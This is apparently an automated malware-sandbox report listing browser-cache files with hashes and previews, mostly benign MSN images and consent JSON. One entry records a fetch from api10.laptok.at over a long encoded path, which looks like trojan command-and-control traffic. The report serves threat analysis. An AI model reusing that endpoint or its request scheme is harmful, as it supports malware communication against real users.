SSDEEP:	768:7EJtcJF/KJyGBx9nkoOoge4DB0LWYgJ2Zxt1vaK8af:7EyjKJ9Bn1Oogn06Y1ZcG
MD5:	E38552C3BAD509D4FCB24C4C706E0CD5
SHA1:	2AE245AEF45186459BBDBD95BDD8F403E65D0A17
SHA-256:	AA8D1A16D3782F693F2CCE6006646D1E51E61AED1800507BC4570846C5FAE792
SHA-512:	BADE48EDB988822D445C667A964CA84F5B6B7E16AC28C40E850ABCBEF603D954951DAFE4CCF77DD88E31F5224C9D82E8FAC938276FE5177C45DEE13115F905C4
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHqD2.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..,..H....j........U4.].h.[\|.2.S-.<..V.9....).i..l.{<..H...V.B......'.7.%Y.Q.`.E0.ml.Z.......?f..0...0i.Z."...:SU...sK...[F\.8!.T........ Q..r.5..u.F%...*[hAQ._..\|db.Y..cn.<.H.M.......9...;...........JcG.q....mp.... ?..y3..?t...J..?Z.N...Ny5..{..FqKLDW.#..<....=.S=...I..Z.....>?.k.x.k9k#.....#.zb.m.8..."...QtvY.."..\....T.[195v./.qQ......-.( S`...V..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1dHrmf[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	21299
Entropy (8bit):	7.9570805579779
Encrypted:	false
SSDEEP:	384:egZn95jlaxoDLrizXmGzct0MFWBuKJjVZ6S43kKrApmqjRGc:egZnNnDLrizPzctGoKjVZ6S43PLKGc
MD5:	3DBFB59A536D2D2269550A39A06A4652
SHA1:	5FE1BE0F31A31E196D5A767527439A6C05544ED1
SHA-256:	5E8C035CDB872282E3EA3C0BDBE6DE635747C289A7892EFB433DF58260C30A3C
SHA-512:	0FB3A56338B51E971D8CF5B7B825198B994DED2DB0AD1E581DB35462299274D06B63FECBE1D6488DD630B68E4D03A3396FC8C5A0858C697134B1F588343D9D4E
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHrmf.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..r..Q.w..+.X.X........oE.z...[.....^..).(JF.I....j......RMm..xf<Ts.........Z.....xwF...q.5..1.....R..Pr..RK......N.3..)"1.{.&..Us...3I..R..s.u'.C....}j.$.@...;V_.. ..+.....P...T..O.k.....vh......rO..W.;I;.,M$...dv.Z.]..K....s.Q...R...$2...@!.Q.V..d7...Y.hq&.\|.;{.k.ap..T..v..d...l...T7r..\...&.1...Z..7h@..=}kv.....#P......-.Gr...n.G\|.[..IT.+.8..?J..i.TJZ.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1dHtp6[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	downloaded
Size (bytes):	2253
Entropy (8bit):	7.78786287066661
Encrypted:	false
SSDEEP:	48:BGpuERA6jOUMPO7P3+koV2Aqi7u13fB7BykHijHAZtZ6Xu1aDR:BGAE3jOU4cP3+tVr8tBykCjaE+UDR
MD5:	C4E92241C45D45CD97AD1FA9A347C2EE
SHA1:	1A6B9196E29B41F8638C7D6DC21D30E124319084
SHA-256:	7C775795923261D0D4D8BE9FBA659D22E35C8B0D4902B1D8486EAA56732AE440
SHA-512:	4A18EAA24CF0A8EC47B0CD27BCB5CEBA9141EDA3D04D0F5009B3378F4EC0838E5286A4701D2D62249F7CABC1003922DF5CF01626A7BA840ACCF2FF8E88445183
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHtp6.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=814&y=269
Preview:	......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......i...Z..u..O.5..(.}.ec[.^..p.1.K..s..>.#..J..i..>CJ.@\...aB...q\.c...ob.+.T....\|.E..V..V..B...TE....$.~G.O.....5....n...L....sM.K@T...[.^C...x.VV9fc..F:~t.4......J...[..H..zj.X:R].AFHV.[.g......w....+)o.W.Opy..q... ..m3BK.Y.. .5Z.._4A0]......iX...8.pO.Lq.....'...<O..[Wi-.;d@....Q[..u.D.p...+&.6.._..q....FL.....h.&Z....g.5.....-6.wN2.px...K.\4.3.X.5..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1dI7Lp[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 311x333, frames 3
Category:	downloaded
Size (bytes):	9021
Entropy (8bit):	7.899406863787176
Encrypted:	false
SSDEEP:	192:xYwnY63OjNyJnkypRJ+OUnavps2ErpdOtE5tGiRhs6HvPH8G/6:Oh63OjNMfJaa2dOtShs2nI
MD5:	3CF8846127F3D9F21F414BDCD6FE4579
SHA1:	7CFBE37EF70DC213E27C68F255EC25B5FE843A12
SHA-256:	B3C5F8B63813532D48B6FB743CF3D355380BBD4F81E770C6DECF51D4214D3140
SHA-512:	7B19278C334563EB9ECDAC1340F31C5ED872C230AF5EC7586049B4ECE8DE5AE8732DC74605C135F1F4AB1AC095B9AF2A84BC36B9FF523BBFA2DA3AB91D9A4EAF
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dI7Lp.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.\|lsVQ.=O..Z&M.....ZINx5...Z..1..... ..H.T...Z.-...$..[..p...T..4Vdo.i.....!.oCW........%.......(...(...(...(...(........[..iii.]."n..ZM<...kF...0d..#.H...:4..S.tEA. .Uf..A.....rl5E...X.n.N.C..hIV...l&...X..Q..[\|....@.S..v...>.....WQ..k(.7....>.*IvDR+....SsQ....B.P2..#..>..Oj.8..j9...V..,.....@..2+vd....j.... ...aE[.c...)..F.W.+T...^G.z......V`p\..LGs..i.}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1dzReS[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	downloaded
Size (bytes):	30084
Entropy (8bit):	7.955889426852974
Encrypted:	false
SSDEEP:	768:77vgc+spX0FfVIq5EYpXX9rhIiit4C0HS0LY9U:7J0FfVyYpH9rhAt4C0HS/C
MD5:	D9684BA6D368537ACA9B8DB1962BCB52
SHA1:	4F81044B90981D24EE92DD60139FA44BF234525F
SHA-256:	1D22F57891AA9CE37135E0DB745C16A2590D25A8ADE7FC5B0E3DEE4E7EAAA92A
SHA-512:	910FB7901661F29C24B19DDC54B99D124B5F6F118A155343259A98D837BA6510FA70A2B86867D49D457730932AF21E6E7FBEE52F4C514CE7FFB0A3BE465CC8E0
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dzReS.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
Preview:	......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...E8M... E.Q..U$..o..9.yK..A.)........a&.&.m2.:.n...(..L# ..S.tM...G\.V\...GJ_..G'..5.z.....%e...O.L.f...[..\|.c.h.R.&...W.Q.I..3...j..?.Xt..M.i..CY.oV.a1.a.65...g-..z.5-........T..9...u....8`..B5g..$...Zoa.]....md..6.....Ny........REu..Q.............K-.-1Z...E.!4.Lc@.4.i....!......y0.....E...M)\..%..C;..$T.ZD/t..].......".o.H.\...-".....5..jl.W<.;.O.$-

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB7gRE[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	482
Entropy (8bit):	7.256101581196474
Encrypted:	false
SSDEEP:	12:6v/78/kFLsiHAnE3oWxYZOjNO/wpc433jHgbc:zLeO/wc433Cc
MD5:	307888C0F03ED874ED5C1D0988888311
SHA1:	D6FB271D70665455A0928A93D2ABD9D9C0F4E309
SHA-256:	D59C8ADBE1776B26EB3A85630198D841F1A1B813D02A6D458AF19E9AAD07B29F
SHA-512:	6856C3AA0849E585954C3C30B4C9C992493F4E28E41D247C061264F1D1363C9D48DB2B9FA1319EA77204F55ADBD383EFEE7CF1DA97D5CBEAC27EC3EF36DEFF8E
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....wIDAT8O.RKN.0.}v\....U....-.. ......8..{$...z..@.....+.......K...%)...I......C4.../XD].Y..:.w.....B9..7..Y..(.m.3. .!..p..,.c.>.\<H.0....,w:.F..m...8c,.^........E.......S...G.%.y.b....Ab.V.-.}.=..."m.O..!...q.....]N.)..w..\..v^.^...u...k..0.....R.....c!.N...DN`)x..:.."*Brg.0avY.>.h...C.S...Fqv._.]......E.h.\|Wg..l........@.$.Z.]....i8.$).t..y.W..H..H.W.8..B...'............IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB7hg4[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	458
Entropy (8bit):	7.172312008412332
Encrypted:	false
SSDEEP:	12:6v/78/kFj13TC93wFdwrWZdLCUYzn9dct8CZsWE0oR0Y8/9ki:u138apdLXqxCS7D2Y+
MD5:	A4F438CAD14E0E2CA9EEC23174BBD16A
SHA1:	41FC65053363E0EEE16DD286C60BEDE6698D96B3
SHA-256:	9D9BCADE7A7F486C0C652C0632F9846FCFD3CC64FEF87E5C4412C677C854E389
SHA-512:	FD41BCD1A462A64E40EEE58D2ED85650CE9119B2BB174C3F8E9DA67D4A349B504E32C449C4E44E2B50E4BEB8B650E6956184A9E9CD09B0FA5EA2778292B01EA5
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J...._IDAT8O.RMJ.@...&.....B%PJ.-.......... ...7..P..P....JhA..$Mf..j.n.~.y...}...:...b...b.H<.)...f.U...fs`.rL....}.v.B..d.15..\T..Z_..'.}..rc....(...9V.&.....\|.qd...8.j..... J...^..q.6..KV7Bg.2@).S.l#R.eE.. ..:_.....l.....FR........r...y...eIC......D.c......0.0..Y..h....t....k.b..y^..1a.D..\|...#.ldra.n.0.......:@.C.Z..P....@...*......z.....p....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBIbTiS[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	820
Entropy (8bit):	7.627366937598049
Encrypted:	false
SSDEEP:	24:U/6gJ+qQtUHyxNAM43wuJFnFMDF3AJ12DG7:U/6gMqQtUSxNT43BFnsRACC
MD5:	9B7529DFB9B4E591338CBD595AD12FF7
SHA1:	0A127FA2778A1717D86358F59D9903836FCC602E
SHA-256:	F1A3EA0DF6939526DA1A6972FBFF8844C9AD8006DE61DD98A1D8A2FB52E1A25D
SHA-512:	4154EC25031ED6BD2A8473F3C3A3A92553853AD4DEFBD89DC4DD72546D8ACAF8369F0B63A91E66DC1665CE47EE58D9FDD2C4EEFCC61BF13C87402972811AB527
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBIbTiS.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs.................IDAT8O.S.K.Q....m.[.L\.,%I..S......^.^.z..^..{..-.Bz.....MA+...........{W....p.9..;.s....^..z..!...+..#....3.P..p.z5.~..x>.D.].h.~m..Z..c.5..n..w...S."..U.....X.o...;}.f..:.}]`..<S...7.P{k..T.....K.._.E..%x.?eRp..{.....9.......,,..L.......... .......})..._ TM)..Z.mdQ.......sY .q..,.T1.y.,lJ.y...'?...H..Y...SB..2..b.v.ELp....~.u.S...."8..x1{O....U..Q...._.aO.KV.D\..H..G..#..G.@.u.......3...'...sXc.2s.D.B...^z....I....y...E..v.l.M0.&k`.g....C.`..*..Q..L.6.O&`.t@..\|..7.$Zq...J.. X..ib?,.;&.....?..q.Q.,Bq.&......:#O....o..5.A.K..<..'.+.z...V...&. .......r...4t.......g......B.+-..L3....;ng>..}(.....y.....PP.-.q.....TB........\|HR..w..-....F.....p...3.,..x..q..O..D......)..Vd.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBaK3KR[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	551
Entropy (8bit):	7.412246442354541
Encrypted:	false
SSDEEP:	12:6v/78/kF5ij6uepiHibgdj9hUxSzDLpJL8cs3NKH3bnc7z:WO65iHibeBQSvL7S3N03g
MD5:	5928F2F40E8032C27F5D77E3152A8362
SHA1:	22744343D40A5AF7EA9A341E2E98D417B32ABBE9
SHA-256:	5AF55E02633880E0C2F49AFAD213D0004D335FF6CB78CAD33FCE4643AF79AD24
SHA-512:	364F9726189A88010317F82A7266A7BB70AA97C85E46D15D245D99C7C97DB69399DC0137F524AE5B754142CCCBD3ACB6070CAFD4EC778DC6E6743332BDA7C7B1
Malicious:	false
IE Cache URL:	https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBaK3KR.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J.....IDAT8O..9,.q..:&.E..#.,B".D.Zll..q,H.......DH..X5.@....P!.#......m?...~C....}......M\.....hb.G=..}.N..b.LYz.b.%.>..}...]..o$..2(.OF_..O./...pxt%...................S.mf..4..p~y...#:2.C......b.........a.M\S.!O.Xi.2.....DC... e7v.$.P[....l..Gc..OD...z..+u...2a%.e.....J.>..s.............]..O..RC....>....&.@.9N.r...p.$..=.d\|fG%&..f...kuy]7....~@eI.R....>.......DX.5.&..,V;.[..W.rQA.z.r.].......%N>\..X.e.n.^&.ij...{.W....T.......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\de-ch[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	76785
Entropy (8bit):	5.343242780960818
Encrypted:	false
SSDEEP:	768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCFPQtihPxVUYUEJ0YAtF:olLEJxa4CmdiuWloIti1wYm7B
MD5:	DBACAF93F0795EB6276D58CC311C1E8F
SHA1:	4667F15EAB575E663D1E70C0D14FE2163A84981D
SHA-256:	51D30486C1FE33A38A654C31EDB529A36338FBDFA53D9F238DCCB24FF42F75AF
SHA-512:	CFC1986EF5C82A9EA3DCD22460351DA10CF17BA6CDC1EE8014AAA8E2A255C66BB840B0A5CC91E0EB42E6FE50EC0E2514A679EA960C827D7C8C9F891E55908387
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/6f0cca92-2dda-4588-a757-0e009f333603/de-ch.json
Preview:	{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\ha[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2464
Entropy (8bit):	5.985101502504591
Encrypted:	false
SSDEEP:	48:IwgrwffRMN+4xpihcoAtmdydQ+nR4z3Swa0FUBmmX3Aw6Ixt6iMibzuM8WyVN:Iwgk3RFutmKQi4r1kHAwjxpV2M8L
MD5:	A214C9D621F37A4A5DD418FE4B986283
SHA1:	96B4D5DED9599F50A7557A927384A054721496C6
SHA-256:	A63A214D997D6A6B91E278F99EE16E9EDD06ABC4C515797838E22B8E59C96784
SHA-512:	9D7F21113869653138AF6DE31ED741CC17EA7C5FD0EA2540290AB31B1730E77D0226C0565328466B7A578074F4793EAE14E881E69D7C2F8D5D354A130E97779E
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha
Preview:	yH1jdu6A3JXa3Lq3zi2fILvgOkzlvcXN9uLrxhqmjf7xZ9FlGvpMoGwaRCwOHC/VJHobp6f5mxQDagdXf/UAykqOez2iAi8S1QTxI5RjciQ9M3zJ0gO+uB+8UjKkmhXXi8zFhjqj6P/xOgW/cj3KpjoEfV447fouT6/cGaELhOBtGrGYRpwNPPm+4diOo2POKlysoWnAzdgVA5dtjvhPkBXKpqO7l/JlZHCGmL1OvwLvkrTbCf1U4Tq4/HT/NrZ22ih3uLfsgJooHHxSOzfrHo666q7tTAmlZ1UntrTIm/QQmAjpFTqZavEeuxOCFsISObUg7E5LQ1dIfLBq0oQ4ksS/1KnZAuSTq4SNqmSu9DW4uAQkIk+N9gy6ZFeIf7xvhvpAixu+hYTmR9yLxU/Qb0z1aBU4Hj8ERvvOz/MKwQd5VBw43xKJJOF5BBMU3Pki/SXdkzLqVWVHG2Rg57xug1xL7LMC7zWaP8R7J1vMH0AgFkJ2nfTlFNCjm+KQa/t+BbaaQFyBcVeVpQ3pF2nvbiiwK2n8sE0k4Ph7uoIzN2yMwbgHk3+anOifiPAhaMju58fIJ4WaUvwESVZkBw/hGX7XpxAPBTdEbRvnLspelcDP659e9xh9ql7VgTtCF1cArfTXZbhjik8shl2NFbFC0Hvj/DseaIhwN/UHuS1BoHf8TNQ6i103oFq7s7Krif5AkWhM9ch6ZDz42UUt4OvaHicTbXJfHWLH6jF9O8P3Bmfe/7fbd4ZsW2A/bjkowyXYhKJfNQJliooD/r2+3MNXX3b60IE/20q+rVPqJer3QaqMAc6GhvUMEwiYYX4m2+Vt44nItwj+CZYK36CiIq6z/3Hukr1gIDWJ7ExtFGVnhs2ZHRZ+3AMz2J0gr9iFY2pdTXgeJA40mOUlHiYdnLVe3/K+oqbSSc95y3pVukE2MDbyJa6owW73M6kqG/cptKjYODRdeQSR5esF7eSOaeJq+I9U8qtrhkqaUmKyiXcq

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_1922f0dc8699bf8edcf7c727cbc43d75[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	33654
Entropy (8bit):	7.93677204324885
Encrypted:	false
SSDEEP:	768:BYyF/HAL/a8mvWHUHD1aJ1izFi/1kp99ssSdA:BxE/We0HD148j
MD5:	C63DABAF54A1E9D41C87A8D67E56D68A
SHA1:	C07BF0B5ED6DE22AC372782599D8A7ED74F82348
SHA-256:	2C676E5170D304519ED2F955C9F14B8D5D2535642A5A447A54FCCFE91C8AF80F
SHA-512:	47FD83E49A1D35C83D02B649D539B4B0D36A72E3B0586FBCDA9460AA1FB533A719983998C75B9EDF2E261563E47CA702A793801037EF207DDA5F3982CBA45107
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F1922f0dc8699bf8edcf7c727cbc43d75.jpg
Preview:	......JFIF.............XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_e422867e373581902d24ef95be7d4e1b[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	7445
Entropy (8bit):	7.93831956568165
Encrypted:	false
SSDEEP:	192:6Lj959JigoMQOL8q6TkMlYo6UsZlwtrGDWTInXeGcCS:6Lj/9Jdk+Ml76h2Kk
MD5:	C4B9684545B9781F5F19A99ECD6A95B5
SHA1:	C25C9E466C46184BE03D654BF13DED7D55E71C1B
SHA-256:	845E13CB4404F674F57C712D570BC9E353A2CB742722DA9116F272B9226C71F7
SHA-512:	1E0B379E40FB2099462BC75C653217469071D59408F9030E4255E65765140C7762F2332CE3FD78E18337EBCB0A95E729AB2C71A79B2761DE8C8700FA6455172E
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fe422867e373581902d24ef95be7d4e1b.jpg
Preview:	......JFIF...........................................%......%!(!.!(!;/))/;E:7:ESJJSici................................%......%!(!.!(!;/))/;E:7:ESJJSici.........7...."..........4.................................................................(..{P....>.#.....M..N+EF...=U.W.'.).0..(.ipG..u.K..JP..C.....[.%.p......My<$q..LI!......k..B .j$6..J...$V<.)rY.).....KK r&.&.+...I..@4..".-.h5s..X.9gJ...D..[........`./.rsn..'C.r\|b..2^.m.V{.B.&./H....%..&..p>m.X.O..._`..'~.b/H....{.0.qcS.P.....R.]x.......zW.h.+.~.T..@..o..;.+..F....J.4.p......>..Q.U...L.p...v...&.e.D..R5P.y.4K}.m.X.HK.. ..y.h.3eiP...h.[..u.,..B.1..c..$.(.5Fn..5...j.;..I..k.j.......q....J.G.......g...H.J3b.I..@LJd.....g.9x<AgB._W..b.d.K..}.0..;^.hw.r...".....}..?...,......~.9..]....t...`"._P.D>M.[o.@...:.....n..]..Z...%?N...i?u../"..&.V.W0u..=.v.H.. ......6...7.?b.e}...!.......@..b.....G.t.......9...r...6..[..)......l[..m.}...Y)7.-.3..p.;......+..T..S...5V..e....SE.V..M&..{.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\iab2Data[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	230026
Entropy (8bit):	5.150044456837813
Encrypted:	false
SSDEEP:	768:l3JqIWtk5N1cfkCHGd5btLkWUuSKQlqmPTZ1j5sIbUkjsyYAAA:l3JqIGk5Med5btLksSKkPnjNjh4A
MD5:	6AAA0F3074990A455B222A4D044E2346
SHA1:	6443AF82ED596527261B0F4367A67DD4D1BA855B
SHA-256:	1232E273F047113AB950CC141FC73D50640D2352B2ED16B89A1BAC01A80BEBEC
SHA-512:	EDE13CDE1DDEB45CD038042DCC6C1F75664EC259BC44100EB9C36361CFB657A7A661901DFEAD44DF6CEC555406A221970DF10F562AE222226546B7EFCE8E6E8D
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 